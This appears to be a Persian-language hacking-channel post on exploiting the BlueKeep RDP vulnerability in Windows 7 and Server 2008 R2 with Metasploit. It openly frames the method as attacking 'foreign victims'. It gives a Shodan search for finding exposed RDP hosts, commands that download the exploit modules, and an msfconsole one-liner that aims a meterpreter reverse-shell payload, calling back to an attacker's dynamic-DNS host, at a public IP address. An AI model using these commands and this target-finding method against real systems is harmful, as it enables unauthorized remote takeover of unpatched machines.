Bluekeep

#BlueKeep_RDP
به تازگی اکسپلویت BlueKeep به زبان Ruby ترجمه و در Exploit-DB قرار گرفته که ما نحوه Import اون در Metasploit و اجرا کردنش بر روی قربانیان خارجی آسیب پذیر رو به نمایش میگزاریم, ورژن های آسیب پذیر سیستم عامل ویندوز هم به شرح زیر است,Windows 7 SP1 / 2008 R2 (6.1.7601 x64)# Shodan Dork
https://www.shodan.io/search?query=port%3A%223389%22+os%3A%22Windows+7+or+8%22# Import Exploit
root@unk9vvn:~# mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp;chmod 755 /usr/share/metasploit-framework/modules/exploits/windows/rdp;wget https://www.exploit-db.com/raw/47416 -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/bluekeep.rb;chmod 755 /usr/share/metasploit-framework/modules/exploits/windows/rdp/bluekeep.rb# Execute Exploit
root@wwwww:~# msfconsole -qx “reload_all;use windows/rdp/bluekeep;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST example.ddns.net;set LPORT 4141;set RHOSTS 139.9.75.181;set EnableContextEncoding true;run -j”✨ اکسپلویت آسیب پذیری RDP BlueKeep با استفاده از Metasploit
چگونگی بهره برداری از آسیب پذیری RDP BlueKeep با استفاده از Metasploit در Kali Linux🔹 مرحله 1: اطمینان حاصل کنید که از آخرین نسخه Metasploit استفاده می کنید
apt install Metsploit-framework
🔹 مرحله 2: تمام ماژول های مربوط به BlueKeep را از کد منبع Metasploit دانلود کنید
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
🔹 مرحله 3: انتقال این پرونده ها به دایرکتوری Metasploit
mv rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
mv rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
🔹 مرحله 4: متاسپلویت را راه اندازی کنید
msf5 > reload_all
🔹 مرحله 5: از ماژول cve_2019_0708_bluekeep_rce استفاده کنید
set RHOSTS 192.168.31.75
set TARGET 3#RDP_BlueKeep
#BlueKeep
#Metasploit
#Exploiting

Categories: